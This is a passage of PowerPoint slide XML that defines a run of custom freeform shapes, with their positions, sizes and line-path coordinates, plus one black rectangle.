                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>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69" name="CustomShape 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="3433680"/>
            <a:ext cx="29880" cy="145800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>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470" name="CustomShape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827440" y="3414600"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="104">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>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471" name="CustomShape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="3441600"/>
            <a:ext cx="28080" cy="128160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18" h="81">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>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472" name="CustomShape 260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2673360" y="3449520"/>
            <a:ext cx="21960" cy="109080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="69">
                <a:moveTo>
                  <a:pt x="5" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>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473" name="CustomShape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="3459240"/>
            <a:ext cx="18720" cy="90000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="57">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>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474" name="CustomShape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="3467160"/>
            <a:ext cx="15480" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10" h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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475" name="CustomShape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2678040" y="3476520"/>
            <a:ext cx="10800" cy="53640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="34">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>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476" name="CustomShape 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828880" y="3424320"/>
            <a:ext cx="37800" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="24" h="91">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>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477" name="CustomShape 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830680" y="3435480"/>
            <a:ext cx="29880" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="77">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>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478" name="CustomShape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="3444840"/>
            <a:ext cx="23400" cy="101160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15" h="64">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>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479" name="CustomShape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="3454560"/>
            <a:ext cx="18720" cy="80640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="51">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12"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480" name="CustomShape 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835360" y="3465360"/>
            <a:ext cx="14040" cy="58320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="37">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>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481" name="CustomShape 269"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639880" y="3449520"/>
            <a:ext cx="6120" cy="186840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="CustomShape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706840" y="3446640"/>
            <a:ext cx="72720" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="46" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>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483" name="CustomShape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="3511440"/>
            <a:ext cx="58320" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="10">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
